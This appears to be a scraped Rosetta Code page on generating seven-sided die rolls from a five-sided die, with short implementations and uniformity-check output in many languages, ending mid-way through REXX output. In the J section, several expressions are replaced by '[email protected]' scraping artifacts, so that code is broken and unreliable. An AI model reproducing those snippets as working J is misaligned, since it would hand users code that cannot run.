Clojure\n\nUses the verify function defined in Verify distribution uniformity/Naive#Clojure\n\n`(def dice5 #(rand-int 5)) (defn dice7 [] (quot (->> dice5 ; do the following to dice5 (repeatedly 2) ; call it twice (apply #(+ %1 (* 5 %2))) ; d1 + 5*d2 => 0..24 #() ; wrap that up in a function repeatedly ; make infinite sequence of the above (drop-while #(> % 20)) ; throw away anything > 20 first) ; grab first acceptable element 3)) ; divide by three rounding down (doseq [n [100 1000 10000] [num count okay?] (verify dice7 n)] (println \"Saw\" num count \"times:\" (if okay? \"that's\" \" not\") \"acceptable\"))`\n```Saw 0 10 times: not acceptable\nSaw 1 19 times: not acceptable\nSaw 2 12 times: not acceptable\nSaw 3 15 times: that's acceptable\nSaw 4 11 times: not acceptable\nSaw 5 11 times: not acceptable\nSaw 6 22 times: not acceptable\nSaw 0 142 times: that's acceptable\nSaw 1 158 times: not acceptable\nSaw 2 151 times: that's acceptable\nSaw 3 153 times: that's acceptable\nSaw 4 118 times: not acceptable\nSaw 5 139 times: that's acceptable\nSaw 6 139 times: that's acceptable\nSaw 0 1498 times: that's acceptable\nSaw 1 1411 times: that's acceptable\nSaw 2 1436 times: that's acceptable\nSaw 3 1434 times: that's acceptable\nSaw 4 1414 times: that's acceptable\nSaw 5 1408 times: that's acceptable\nSaw 6 1399 times: that's acceptable```\n\n## Common Lisp\n\nTranslation of: C\n`(defun d5 () (1+ (random 5))) (defun d7 () (loop for d55 = (+ (* 5 (d5)) (d5) -6) until (< d55 21) finally (return (1+ (mod d55 7)))))`\n```> (check-distribution 'd7 1000)\nDistribution potentially skewed for 1: expected around 1000/7 got 153.\nDistribution potentially skewed for 2: expected around 1000/7 got 119.\nDistribution potentially skewed for 3: expected around 1000/7 got 125.\nDistribution potentially skewed for 7: expected around 1000/7 got 156.\nT\n#<EQL Hash Table{7} 200B5A53>\n\n> (check-distribution 'd7 10000)\nNIL\n#<EQL Hash Table{7} 200CB5BB>```\n\n## D\n\nTranslation of: C++\n`import std.random;import verify_distribution_uniformity_naive: distCheck; /// Generates a random number in [1, 5].int dice5() /*pure nothrow*/ @safe { return uniform(1, 6);} /// Naive, generates a random number in [1, 7] using dice5.int fiveToSevenNaive() /*pure nothrow*/ @safe { immutable int r = dice5() + dice5() * 5 - 6; return (r < 21) ? (r % 7) + 1 : fiveToSevenNaive();} /**Generates a random number in [1, 7] using dice5,minimizing calls to dice5.*/int fiveToSevenSmart() @safe { static int rem = 0, max = 1;  while (rem / 7 == max / 7) { while (max < 7) { immutable int rand5 = dice5() - 1; max *= 5; rem = 5 * rem + rand5; }  immutable int groups = max / 7; if (rem >= 7 * groups) { rem -= 7 * groups; max -= 7 * groups; } }  immutable int result = rem % 7; rem /= 7; max /= 7; return result + 1;} void main() /*@safe*/ { enum int N = 400_000; distCheck(&dice5, N, 1); distCheck(&fiveToSevenNaive, N, 1); distCheck(&fiveToSevenSmart, N, 1);}`\nOutput:\n```1 80365\n2 79941\n3 80065\n4 79784\n5 79845\n\n1 57186\n2 57201\n3 57180\n4 57231\n5 57124\n6 56832\n7 57246\n\n1 57367\n2 56869\n3 57644\n4 57111\n5 57157\n6 56809\n7 57043```\n\n## E\n\nTranslation of: Common Lisp\n This example is in need of improvement: Write dice7 in a prettier fashion and use the distribution checker once it's been written.\n`def dice5() { return entropy.nextInt(5) + 1} def dice7() { var d55 := null while ((d55 := 5 * dice5() + dice5() - 6) >= 21) {} return d55 %% 7 + 1}`\n`def bins := ( * 7).diverge()for x in 1..1000 { bins[dice7() - 1] += 1}println(bins.snapshot())`\n\n## Elixir\n\n`defmodule Dice do def dice5, do: :rand.uniform( 5 )  def dice7 do dice7_from_dice5 end  defp dice7_from_dice5 do d55 = 5*dice5 + dice5 - 6 # 0..24 if d55 < 21, do: rem( d55, 7 ) + 1, else: dice7_from_dice5 endend fun5 = fn -> Dice.dice5 endIO.inspect VerifyDistribution.naive( fun5, 1000000, 3 )fun7 = fn -> Dice.dice7 endIO.inspect VerifyDistribution.naive( fun7, 1000000, 3 )`\nOutput:\n```:ok\n:ok\n```\n\n## Erlang\n\n` -module( dice ). -export( [dice5/0, dice7/0, task/0] ). dice5() -> random:uniform( 5 ). dice7() ->\tdice7_small_enough( dice5() * 5 + dice5() - 6 ). % 0 - 24 task() -> verify_distribution_uniformity:naive( fun dice7/0, 1000000, 1 ).   dice7_small_enough( N ) when N < 21 -> N div 3 + 1;dice7_small_enough( _N ) -> dice7(). `\nOutput:\n```76> dice:task().\nok\n```\n\n## Factor\n\n`USING: kernel random sequences assocs locals sorting prettyprint math math.functions math.statistics math.vectors math.ranges ;IN: rosetta-code.dice7 ! Output a random integer 1..5.: dice5 ( -- x ) 5 [1,b] random; ! Output a random integer 1..7 using dice5 as randomness source.: dice7 ( -- x ) 0 [ dup 21 < ] [ drop dice5 5 * dice5 + 6 - ] do until 7 rem 1 +; ! Roll the die by calling the quotation the given number of times and return! an array with roll results.! Sample call: 1000 [ dice7 ] roll: roll ( times quot: ( -- x ) -- array ) [ call( -- x ) ] curry replicate; ! Input array contains outcomes of a number of die throws. Each die result is! an integer in the range 1..X. Calculate and return the number of each! of the results in the array so that in the first position of the result! there is the number of ones in the input array, in the second position! of the result there is the number of twos in the input array, etc.: count-dice-outcomes ( X array -- array ) histogram swap [1,b] [ over [ 0 or ] change-at ] each sort-keys values; ! Verify distribution uniformity/Naive. Delta is the acceptable deviation! from the ideal number of items in each bucket, expressed as a fraction of! the total count. Sides is the number of die sides. Die-func is a word that! produces a random number on stack in the range [1..sides], times is the! number of times to call it.! Sample call: 0.02 7 [ dice7 ] 100000 verify:: verify ( delta sides die-func: ( -- random ) times -- ) sides times die-func roll count-dice-outcomes dup . times sides / :> ideal-count ideal-count v-n vabs times v/n delta [ < ] curry all? [ \"Random enough\" . ] [ \"Not random enough\" . ] if;  ! Call verify with 1, 10, 100, ... 1000000 rolls of 7-sided die.: verify-all ( -- ) { 1 10 100 1000 10000 100000 1000000 } [| times | 0.02 7 [ dice7 ] times verify ] each;`\nOutput:\n```USE: rosetta-code.dice7 verify-all\n{ 0 0 0 1 0 0 0 }\n\"Not random enough\"\n{ 0 2 3 1 1 1 2 }\n\"Not random enough\"\n{ 17 12 15 11 13 13 19 }\n\"Not random enough\"\n{ 140 130 141 148 143 155 143 }\n\"Random enough\"\n{ 1457 1373 1427 1433 1443 1382 1485 }\n\"Random enough\"\n{ 14225 14320 14216 14326 14415 14084 14414 }\n\"Random enough\"\n{ 142599 141910 142524 143029 143353 142696 143889 }\n\"Random enough\"```\n\n## Forth\n\nWorks with: GNU Forth\n`require random.fs : d5 5 random 1+ ;: discard? 5 = swap 1 > and ;: d7 begin d5 d5 2dup discard? while 2drop repeat 1- 5 * + 1- 7 mod 1+ ;`\nOutput:\n```cr ' d7 1000000 7 1 check-distribution .\nlower bound = 141429 upper bound = 144285\n1 : 143241 ok\n2 : 142397 ok\n3 : 143522 ok\n4 : 142909 ok\n5 : 142001 ok\n6 : 142844 ok\n7 : 143086 ok\n-1```\n\n## Fortran\n\nWorks with: Fortran version 95 and later\n`module rand_mod implicit none contains function rand5() integer :: rand5 real :: r  call random_number(r) rand5 = 5*r + 1end function function rand7() integer :: rand7  do rand7 = 5*rand5() + rand5() - 6 if (rand7 < 21) then rand7 = rand7 / 3 + 1 return end if end doend functionend module program Randtest use rand_mod implicit none  integer, parameter :: samples = 1000000  call distcheck(rand7, samples, 0.005) write(*,*) call distcheck(rand7, samples, 0.001) end program`\nOutput:\n```Distribution Uniform\n\nDistribution potentially skewed for bucket 1 Expected: 142857 Actual: 143142\nDistribution potentially skewed for bucket 2 Expected: 142857 Actual: 143454\nDistribution potentially skewed for bucket 3 Expected: 142857 Actual: 143540\nDistribution potentially skewed for bucket 4 Expected: 142857 Actual: 142677\nDistribution potentially skewed for bucket 5 Expected: 142857 Actual: 142511\nDistribution potentially skewed for bucket 6 Expected: 142857 Actual: 142163\nDistribution potentially skewed for bucket 7 Expected: 142857 Actual: 142513```\n\n## Go\n\n`package main import ( \"fmt\" \"math\" \"math/rand\" \"time\") // \"given\"func dice5() int { return rand.Intn(5) + 1} // function specified by task \"Seven-sided dice from five-sided dice\"func dice7() (i int) { for { i = 5*dice5() + dice5() if i < 27 { break } } return (i / 3) - 1} // function specified by task \"Verify distribution uniformity/Naive\"//// Parameter \"f\" is expected to return a random integer in the range 1..n.// (Values out of range will cause an unceremonious crash.)// \"Max\" is returned as an \"indication of distribution achieved.\"// It is the maximum delta observed from the count representing a perfectly// uniform distribution.// Also returned is a boolean, true if \"max\" is less than threshold// parameter \"delta.\"func distCheck(f func() int, n int, repeats int, delta float64) (max float64, flatEnough bool) { count := make([]int, n) for i := 0; i < repeats; i++ { count[f()-1]++ } expected := float64(repeats) / float64(n) for _, c := range count { max = math.Max(max, math.Abs(float64(c)-expected)) } return max, max < delta} // Driver, produces output satisfying both tasks.func main() { rand.Seed(time.Now().UnixNano()) const calls = 1000000 max, flatEnough := distCheck(dice7, 7, calls, 500) fmt.Println(\"Max delta:\", max, \"Flat enough:\", flatEnough) max, flatEnough = distCheck(dice7, 7, calls, 500) fmt.Println(\"Max delta:\", max, \"Flat enough:\", flatEnough)}`\nOutput:\n```Max delta: 356.1428571428696 Flat enough: true\nMax delta: 787.8571428571304 Flat enough: false\n```\n\n## Groovy\n\n`random = new Random() int rand5() { random.nextInt(5) + 1} int rand7From5() { def raw = 25 while (raw > 21) { raw = 5*(rand5() - 1) + rand5() } (raw % 7) + 1}`\n\nTest:\n\n`def test = { (1..6). each { def counts = [0g, 0g, 0g, 0g, 0g, 0g, 0g] def target = 10g**it def popSize = 7*target (0..<(popSize)).each { def i = rand7From5() - 1 counts[i] = counts[i] + 1g } BigDecimal stdDev = (counts.collect { it - target}.collect { it * it }.sum() / popSize) ** 0.5g def countMap = (0..<counts.size()).inject([:]) { map, index -> map + [(index+1):counts[index]] }  println \"\"\"\\ counts: \\${countMap}population size: \\${popSize} std dev: \\${stdDev.round(new java.math.MathContext(3))}\"\"\" }} 4.times { println \"\"\"TRIAL #\\${it+1}==============\"\"\" test(it)}`\nOutput:\n```TRIAL #1\n==============\ncounts: [1:16, 2:10, 3:9, 4:7, 5:12, 6:8, 7:8]\npopulation size: 70\nstd dev: 0.910\n\ncounts: [1:85, 2:97, 3:108, 4:110, 5:95, 6:105, 7:100]\npopulation size: 700\nstd dev: 0.800\n\ncounts: [1:990, 2:1008, 3:992, 4:1060, 5:1008, 6:997, 7:945]\npopulation size: 7000\nstd dev: 0.995\n\ncounts: [1:9976, 2:10007, 3:10009, 4:9858, 5:10109, 6:9988, 7:10053]\npopulation size: 70000\nstd dev: 0.714\n\ncounts: [1:100310, 2:99783, 3:99843, 4:100353, 5:99804, 6:99553, 7:100354]\npopulation size: 700000\nstd dev: 0.968\n\ncounts: [1:999320, 2:1000942, 3:1000201, 4:1000878, 5:999181, 6:999632, 7:999846]\npopulation size: 7000000\nstd dev: 0.654\n\nTRIAL #2\n==============\ncounts: [1:10, 2:8, 3:9, 4:9, 5:14, 6:7, 7:13]\npopulation size: 70\nstd dev: 0.756\n\ncounts: [1:104, 2:101, 3:97, 4:108, 5:100, 6:87, 7:103]\npopulation size: 700\nstd dev: 0.619\n\ncounts: [1:995, 2:970, 3:1001, 4:953, 5:1006, 6:1081, 7:994]\npopulation size: 7000\nstd dev: 1.18\n\ncounts: [1:10013, 2:10063, 3:9843, 4:9984, 5:9986, 6:10059, 7:10052]\npopulation size: 70000\nstd dev: 0.711\n\ncounts: [1:100048, 2:99647, 3:100240, 4:100683, 5:99813, 6:100320, 7:99249]\npopulation size: 700000\nstd dev: 1.39\n\ncounts: [1:1000579, 2:1000541, 3:999497, 4:1000805, 5:999708, 6:999161, 7:999709]\npopulation size: 7000000\nstd dev: 0.586\n\nTRIAL #3\n==============\ncounts: [1:9, 2:8, 3:11, 4:14, 5:10, 6:11, 7:7]\npopulation size: 70\nstd dev: 0.676\n\ncounts: [1:100, 2:92, 3:105, 4:107, 5:111, 6:91, 7:94]\npopulation size: 700\nstd dev: 0.733\n\ncounts: [1:1010, 2:1053, 3:967, 4:981, 5:1027, 6:959, 7:1003]\npopulation size: 7000\nstd dev: 0.984\n\ncounts: [1:9857, 2:10037, 3:9992, 4:10231, 5:9828, 6:10140, 7:9915]\npopulation size: 70000\nstd dev: 1.37\n\ncounts: [1:99650, 2:99580, 3:99848, 4:100507, 5:99916, 6:100212, 7:100287]\npopulation size: 700000\nstd dev: 1.01\n\ncounts: [1:1001710, 2:999667, 3:1000685, 4:1000411, 5:999369, 6:998469, 7:999689]\npopulation size: 7000000\nstd dev: 0.965\n\nTRIAL #4\n==============\ncounts: [1:12, 2:7, 3:11, 4:12, 5:7, 6:9, 7:12]\npopulation size: 70\nstd dev: 0.676\n\ncounts: [1:97, 2:96, 3:101, 4:93, 5:96, 6:124, 7:93]\npopulation size: 700\nstd dev: 1.01\n\ncounts: [1:985, 2:1023, 3:1018, 4:1023, 5:995, 6:973, 7:983]\npopulation size: 7000\nstd dev: 0.615\n\ncounts: [1:9948, 2:9968, 3:10131, 4:10050, 5:9990, 6:10039, 7:9874]\npopulation size: 70000\nstd dev: 0.764\n\ncounts: [1:100125, 2:99616, 3:99912, 4:100286, 5:99674, 6:100190, 7:100197]\npopulation size: 700000\nstd dev: 0.787\n\ncounts: [1:1001267, 2:999911, 3:1000602, 4:999483, 5:1000549, 6:998725, 7:999463]\npopulation size: 7000000\nstd dev: 0.798```\n\n`import System.Randomimport Data.List sevenFrom5Dice = do d51 <- randomRIO(1,5) :: IO Int d52 <- randomRIO(1,5) :: IO Int let d7 = 5*d51+d52-6 if d7 > 20 then sevenFrom5Dice else return \\$ 1 + d7 `mod` 7`\nOutput:\n`*Main> replicateM 10 sevenFrom5Dice[2,3,1,1,6,2,5,6,5,3]`\n\nTest:\n\n`*Main> mapM_ print .sort =<< distribCheck sevenFrom5Dice 1000000 3(1,(142759,True)) (2,(143078,True)) (3,(142706,True)) (4,(142403,True)) (5,(142896,True)) (6,(143028,True)) (7,(143130,True))`\n\n## Icon and Unicon\n\nTranslation of: Ruby\n\nUses `verify_uniform` from here.\n\n` \\$include \"distribution-checker.icn\" # return a uniformly distributed number from 1 to 7,# but only using a random number in range 1 to 5.procedure die_7 () while rnd := 5*?5 + ?5 - 6 do { if rnd < 21 then suspend rnd % 7 + 1 }end procedure main () if verify_uniform (create (|die_7()), 1000000, 0.01) then write (\"uniform\") else write (\"skewed\")end `\nOutput:\n```5 142870\n2 142812\n7 142901\n4 142960\n1 143113\n6 142706\n3 142638\nuniform\n```\n\n## J\n\nThe first step is to create 7-sided dice rolls from 5-sided dice rolls (`rollD5`):\n\n`rollD5=: [: >: ] [email protected]\\$ 5: NB. makes a y shape array of 5s, \"rolls\" the array and increments.roll2xD5=: [: rollD5 2 ,~ */ NB. rolls D5 twice for each desired D7 roll (y rows, 2 cols)toBase10=: 5 #. <: NB. decrements and converts rows from base 5 to 10keepGood=: #~ 21&> NB. compress out values not less than 21groupin3s=: [: >. >: % 3: NB. increments, divides by 3 and takes ceiling getD7=: [email protected]@[email protected]`\n\nHere are a couple of variations on the theme that achieve the same result:\n\n`getD7b=: 0 8 -.~ 3 >[email protected]%~ 5 #. [: <:@rollD5 2 ,~ ]getD7c=: [: (#~ 7&>:) 3 >[email protected]%~ [: 5&#.&.:<:@rollD5 ] , 2:`\n\nThe trouble is that we probably don't have enough D7 rolls yet because we compressed out any double D5 rolls that evaluated to 21 or more. So we need to accumulate some more D7 rolls until we have enough. J has two types of verb definition - tacit (arguments not referenced) and explicit (more conventional function definitions) illustrated below:\n\nHere's an explicit definition that accumulates rolls from `getD7`:\n\n`rollD7x=: monad define n=. */y NB. product of vector y is total number of D7 rolls required rolls=. '' NB. initialize empty noun rolls while. n > #rolls do. NB. checks if if enough D7 rolls accumulated rolls=. rolls, getD7 >. 0.75 * n NB. calcs 3/4 of required rolls and accumulates getD7 rolls end. y \\$ rolls NB. shape the result according to the vector y)`\n\nHere's a tacit definition that does the same thing:\n\n`getNumRolls=: [: >. 0.75 * */@[ NB. calc approx 3/4 of the required rollsaccumD7Rolls=: ] , [email protected] NB. accumulates getD7 rollsisNotEnough=: */@[ > #@] NB. checks if enough D7 rolls accumulated rollD7t=: ] \\$ (accumD7Rolls ^: isNotEnough ^:_)&''`\n\nThe `verb1 ^: verb2 ^:_` construct repeats `x verb1 y` while `x verb2 y` is true. It is like saying \"Repeat accumD7Rolls while isNotEnough\".\n\nExample usage:\n\n` rollD7t 10 NB. 10 rolls of D76 4 5 1 4 2 4 5 2 5 rollD7t 2 5 NB. 2 by 5 array of D7 rolls5 1 5 1 33 4 3 5 6 rollD7t 2 3 5 NB. 2 by 3 by 5 array of D7 rolls4 7 7 5 73 7 1 4 55 4 5 7 6 1 1 7 6 34 4 1 4 41 1 1 6 5 NB. check results from rollD7x and rollD7t have same shape ([email protected] -: [email protected]) 10 1 ([email protected] -: [email protected]) 2 3 5 1`\n\n## Java\n\nTranslation of: Python\n`import java.util.Random;public class SevenSidedDice {\tprivate static final Random rnd = new Random();\tpublic static void main(String[] args)\t{\t\tSevenSidedDice now=new SevenSidedDice();\t\tSystem.out.println(\"Random number from 1 to 7: \"+now.seven());\t}\tint seven()\t{\t\tint v=21;\t\twhile(v>20)\t\t\tv=five()+five()*5-6;\t\treturn 1+v%7;\t}\tint five()\t{\t\treturn 1+rnd.nextInt(5);\t}}`\n\n## JavaScript\n\nTranslation of: Ruby\n`function dice5(){ return 1 + Math.floor(5 * Math.random());} function dice7(){ while (true) { var dice55 = 5 * dice5() + dice5() - 6; if (dice55 < 21) return dice55 % 7 + 1; }} distcheck(dice5, 1000000);print();distcheck(dice7, 1000000);`\nOutput:\n```1 199792\n2 200425\n3 199243\n4 200407\n5 200133\n\n1 143617\n2 142209\n3 143023\n4 142990\n5 142894\n6 142648\n7 142619 ```\n\n## Julia\n\n`dice5() = rand(1:5) function dice7() r = 5*dice5() + dice5() - 6 r < 21 ? (r%7 + 1) : dice7()end`\n\nDistribution check:\n\n```julia> hist([dice5() for i=1:10^6])\n(0:1:5,[199932,200431,199969,199925,199743])\n\njulia> hist([dice7() for i=1:10^6])\n(0:1:7,[142390,143032,142837,142999,142800,142642,143300])```\n\n## Kotlin\n\n`// version 1.1.3 import java.util.Random val r = Random() fun dice5() = 1 + r.nextInt(5) fun dice7(): Int { while (true) { val t = (dice5() - 1) * 5 + dice5() - 1 if (t >= 21) continue return 1 + t / 3 }} fun checkDist(gen: () -> Int, nRepeats: Int, tolerance: Double = 0.5) { val occurs = mutableMapOf<Int, Int>() for (i in 1..nRepeats) { val d = gen() if (occurs.containsKey(d)) occurs[d] = occurs[d]!! + 1 else occurs.put(d, 1) } val expected = (nRepeats.toDouble()/ occurs.size).toInt() val maxError = (expected * tolerance / 100.0).toInt() println(\"Repetitions = \\$nRepeats, Expected = \\$expected\") println(\"Tolerance = \\$tolerance%, Max Error = \\$maxError\\n\") println(\"Integer Occurrences Error Acceptable\") val f = \"  %d  %5d  %5d  %s\" var allAcceptable = true for ((k,v) in occurs.toSortedMap()) { val error = Math.abs(v - expected) val acceptable = if (error <= maxError) \"Yes\" else \"No\" if (acceptable == \"No\") allAcceptable = false println(f.format(k, v, error, acceptable)) } println(\"\\nAcceptable overall: \\${if (allAcceptable) \"Yes\" else \"No\"}\")} fun main(args: Array<String>) { checkDist(::dice7, 1_400_000)}`\n\nSample output:\n\n```Repetitions = 1400000, Expected = 200000\nTolerance = 0.5%, Max Error = 1000\n\nInteger Occurrences Error Acceptable\n1 199285 715 Yes\n2 200247 247 Yes\n3 199709 291 Yes\n4 199983 17 Yes\n5 199990 10 Yes\n6 200664 664 Yes\n7 200122 122 Yes\n\nAcceptable overall: Yes\n```\n\n## Liberty BASIC\n\n` n=1000000 '1000000 would take several minutesprint \"Testing \";n;\" times\"if not(check(n, 0.05)) then print \"Test failed\" else print \"Test passed\"end 'function check(n, delta) is defined at'http://rosettacode.org/wiki/Verify_distribution_uniformity/Naive#Liberty_BASIC function GENERATOR() 'GENERATOR = int(rnd(0)*10) '0..9 'GENERATOR = 1+int(rnd(0)*5) '1..5: dice5  'dice7() do temp =dice5() *5 +dice5() -6 loop until temp <21 GENERATOR =( temp mod 7) +1 end function function dice5() dice5=1+int(rnd(0)*5) '1..5: dice5end function `\nOutput:\n```Testing 1000000 times\nminVal Expected maxVal\n135714 142857 150000\nBucket Counter pass/fail\n1 143310\n2 143500\n3 143040\n4 145185\n5 140998\n6 142610\n7 141357\nTest passed\n```\n\n## Lua\n\n`dice5 = function() return math.random(5) end function dice7() x = dice5() * 5 + dice5() - 6 if x > 20 then return dice7() end return x%7 + 1end`\n\n## M2000 Interpreter\n\nWe make a stack object (is reference type) and pass it as a closure to dice7 lambda function. For each dice7 we pop the top value of stack, and we add a fresh dice5 (random(1,5)) as last value of stack, so stack used as FIFO. Each time z has the sum of 7 random values.\n\nWe check for uniform numbers using +-5% from expected value.\n\n` Module CheckIt { Def long i, calls, max, min s=stack:=random(1,5),random(1,5), random(1,5), random(1,5), random(1,5), random(1,5), random(1,5) z=0: for i=1 to 7 { z+=stackitem(s, i)} dice7=lambda z, s -> { =((z-1) mod 7)+1 : stack s {z-=Number : data random(1,5): z+=Stackitem(7)} } Dim count(1 to 7)=0& ' long type calls=700000 p=0.05 IsUniform=lambda max=calls/7*(1+p), min=calls/7*(1-p) (a)->{ if len(a)=0 then =false : exit =false m=each(a) while m if array(m)<min or array(m)>max then break end while =true } For i=1 to calls {count(dice7())++} max=count()#max() expected=calls div 7 min=count()#min() for i=1 to 7 document doc\\$=format\\$(\"{0}{1::-7}\",i,count(i))+{ } Next i doc\\$=format\\$(\"min={0} expected={1} max={2}\", min, expected, max)+{ }+format\\$(\"Verify Uniform:{0}\", if\\$(IsUniform(count())->\"uniform\", \"skewed\"))+{ } Print report doc\\$ clipboard doc\\$}CheckIt `\nOutput:\n```1 9865\n2 10109\n3 9868\n4 9961\n5 9936\n6 9922\n7 10339\nmin=9865 expected=10000 max=10339\nVerify Uniform:uniform\n\n1 100214\n2 100336\n3 100049\n4 99505\n5 99951\n6 99729\n7 100216\nmin=99505 expected=100000 max=100336\nVerify Uniform:uniform\n```\n\n## Mathematica\n\n`sevenFrom5Dice := (tmp\\$ = 5*RandomInteger[{1, 5}] + RandomInteger[{1, 5}] - 6; If [tmp\\$ < 21, 1 + Mod[tmp\\$ , 7], sevenFrom5Dice])`\n```CheckDistribution[sevenFrom5Dice, 1000000, 5]\n->Expected: 142857., Generated :{142206,142590,142650,142693,142730,143475,143656}\n->\"Flat\"```\n\n## Nim\n\nWe use the distribution checker from task Simple Random Distribution Checker.\n\n`import random, tables  proc dice5(): int = rand(1..5)  proc dice7(): int = while true: let val = 5 * dice5() + dice5() - 6 if val < 21: return val div 3 + 1  proc checkDist(f: proc(): int; repeat: Positive; tolerance: float) =  var counts: CountTable[int] for _ in 1..repeat: counts.inc f()  let expected = (repeat / counts.len).toInt # Rounded to nearest. let allowedDelta = (expected.toFloat * tolerance / 100).toInt var maxDelta = 0 for val, count in counts.pairs: let d = abs(count - expected) if d > maxDelta: maxDelta = d  let status = if maxDelta <= allowedDelta: \"passed\" else: \"failed\" echo \"Checking \", repeat, \" values with a tolerance of \", tolerance, \"%.\" echo \"Random generator \", status, \" the uniformity test.\" echo \"Max delta encountered = \", maxDelta, \" Allowed delta = \", allowedDelta  when isMainModule: import random randomize() checkDist(dice7, 1_000_000, 0.5)`\nOutput:\n```Checking 1000000 values with a tolerance of 0.5%.\nRandom generator passed the uniformity test.\nMax delta encountered = 552 Allowed delta = 714```\n\n## OCaml\n\n`let dice5() = 1 + Random.int 5 ;; let dice7 = let rolls2answer = Hashtbl.create 25 in let n = ref 0 in for roll1 = 1 to 5 do for roll2 = 1 to 5 do Hashtbl.add rolls2answer (roll1,roll2) (!n / 3 +1); incr n done; done; let rec aux() = let trial = Hashtbl.find rolls2answer (dice5(),dice5()) in if trial <= 7 then trial else aux() in aux;;`\n\n## PARI/GP\n\n`dice5()=random(5)+1; dice7()={ my(t); while((t=dice5()*5+dice5()) > 21,); (t+2)\\3};`\n\n## Perl\n\nUsing dice5 twice to generate numbers in the range 0 to 24. If we consider these modulo 8 and re-call if we get zero, we have eliminated 4 cases and created the necessary number in the range from 1 to 7.\n\n`sub dice5 { 1+int rand(5) } sub dice7 { while(1) { my \\$d7 = (5*dice5()+dice5()-6) % 8; return \\$d7 if \\$d7; }} my %count7;my \\$n = 1000000;\\$count7{dice7()}++ for 1..\\$n;printf \"%s: %5.2f%%\\n\", \\$_, 100*(\\$count7{\\$_}/\\$n*7-1) for sort keys %count7; `\nOutput:\n```1: 0.05%\n2: 0.16%\n3: -0.43%\n4: 0.11%\n5: 0.01%\n6: -0.15%\n7: 0.24%\n```\n\n## Phix\n\nreplace rand7() in Verify_distribution_uniformity/Naive#Phix with:\n\n`function dice5() return rand(5)end function function dice7() while true do integer r = dice5()*5+dice5()-3 -- ( ie 3..27, but ) if r<24 then return floor(r/3) end if -- (only 3..23 useful) end whileend function`\nOutput:\n```1000000 iterations: flat\n```\n\n## PicoLisp\n\n`(de dice5 () (rand 1 5) ) (de dice7 () (use R (until (> 21 (setq R (+ (* 5 (dice5)) (dice5) -6)))) (inc (% R 7)) ) )`\nOutput:\n```: (let R NIL\n(do 1000000 (accu 'R (dice7) 1))\n(sort R) )\n-> ((1 . 142295) (2 . 142491) (3 . 143448) (4 . 143129) (5 . 142701) (6 . 143142) (7 . 142794))```\n\n## PureBasic\n\nTranslation of: Lua\n`Procedure dice5() ProcedureReturn Random(4) + 1EndProcedure Procedure dice7() Protected x  x = dice5() * 5 + dice5() - 6 If x > 20 ProcedureReturn dice7() EndIf   ProcedureReturn x % 7 + 1EndProcedure`\n\n## Python\n\n`from random import randint def dice5(): return randint(1, 5) def dice7(): r = dice5() + dice5() * 5 - 6 return (r % 7) + 1 if r < 21 else dice7()`\n\nDistribution check using Simple Random Distribution Checker:\n\n```>>> distcheck(dice5, 1000000, 1)\n{1: 200244, 2: 199831, 3: 199548, 4: 199853, 5: 200524}\n>>> distcheck(dice7, 1000000, 1)\n{1: 142853, 2: 142576, 3: 143067, 4: 142149, 5: 143189, 6: 143285, 7: 142881}\n```\n\n## R\n\n5-sided die.\n\n`dice5 <- function(n=1) sample(5, n, replace=TRUE)`\n\nSimple but slow 7-sided die, using a while loop.\n\n`dice7.while <- function(n=1) { score <- numeric() while(length(score) < n) { total <- sum(c(5,1) * dice5(2)) - 3 if(total < 24) score <- c(score, total %/% 3) } score }system.time(dice7.while(1e6)) # longer than 4 minutes`\n\nMore complex, but much faster vectorised version.\n\n`dice7.vec <- function(n=1, checkLength=TRUE) { morethan2n <- 3 * n + 10 + (n %% 2) #need more than 2*n samples, because some are discarded twoDfive <- matrix(dice5(morethan2n), nrow=2) total <- colSums(c(5, 1) * twoDfive) - 3 score <- ifelse(total < 24, total %/% 3, NA) score <- score[!is.na(score)] #If length is less than n (very unlikely), add some more samples if(checkLength) { while(length(score) < n) { score <- c(score, dice7(n, FALSE)) } score[1:n] } else score }system.time(dice7.vec(1e6)) # ~1 sec`\n\n## Racket\n\n` #lang racket(define (dice5) (add1 (random 5))) (define (dice7) (define res (+ (* 5 (dice5)) (dice5) -6)) (if (< res 21) (+ 1 (modulo res 7)) (dice7))) `\n\nChecking the uniformity using math library:\n\n` -> (require math/statistics)-> (samples->hash (for/list ([i 700000]) (dice7)))'#hash((7 . 100392) (6 . 100285) (5 . 99774) (4 . 100000) (3 . 100000) (2 . 99927) (1 . 99622)) `\n\n## Raku\n\n(formerly Perl 6)\n\nWorks with: Rakudo version 2018.03\n`my \\$d5 = 1..5;sub d5() { \\$d5.roll; } # 1d5 sub d7() { my \\$flat = 21; \\$flat = 5 * d5() - d5() until \\$flat < 21; \\$flat % 7 + 1;} # Testingmy @dist;my \\$n = 1_000_000;my \\$expect = \\$n / 7; loop (\\$_ = \\$n; \\$n; --\\$n) { @dist[d7()]++; } say \"Expect\\t\",\\$expect.fmt(\"%.3f\");for @dist.kv -> \\$i, \\$v { say \"\\$i\\t\\$v\\t\" ~ ((\\$v - \\$expect)/\\$expect*100).fmt(\"%+.2f%%\") if \\$v;}`\nOutput:\n```Expect\t142857.143\n1\t143088\t+0.16%\n2\t143598\t+0.52%\n3\t141741\t-0.78%\n4\t142832\t-0.02%\n5\t143040\t+0.13%\n6\t142988\t+0.09%\n7\t142713\t-0.10%\n```\n\n## REXX\n\n`/*REXX program simulates a 7─sided die based on a 5─sided throw for a number of trials. */parse arg trials sample seed . /*obtain optional arguments from the CL*/if trials=='' | trials=\",\" then trials= 1 /*Not specified? Then use the default.*/if sample=='' | sample=\",\" then sample= 1000000 /* \" \" \" \" \" \" */if datatype(seed,'W') then call random ,,seed /*Integer? Then use it as a RAND seed.*/L= length(trials) /* [↑] one million samples to be used.*/  do #=1 for trials; die.= 0 /*performs the number of desired trials*/ k= 0 do until k==sample; r= 5 * random(1, 5) + random(1, 5) - 6 if r>20 then iterate k= k+1; r=r // 7 + 1; die.r= die.r + 1 end /*until*/ say expect= sample % 7 say center('trial:' right(#, L) \" \" sample 'samples, expect' expect, 80, \"─\")  do j=1 for 7 say ' side' j \"had \" die.j ' occurrences', ' difference from expected:'right(die.j - expect, length(sample) ) end /*j*/ end /*#*/ /*stick a fork in it, we're all done. */`\noutput   when using the input of:     11\n\n(Shown at five-sixth size.)\n\n```──────────────────trial: 1 1000000 samples, expect 142857──────────────────\nside 1 had 142076 occurrences difference from expected: -781\nside 2 had 143053 occurrences difference from expected: 196\nside 3 had 142342 occurrences difference from expected: -515\nside 4 had 142633 occurrences difference from expected: -224\nside 5 had 143024 occurrences difference from expected: 167\nside 6 had 143827 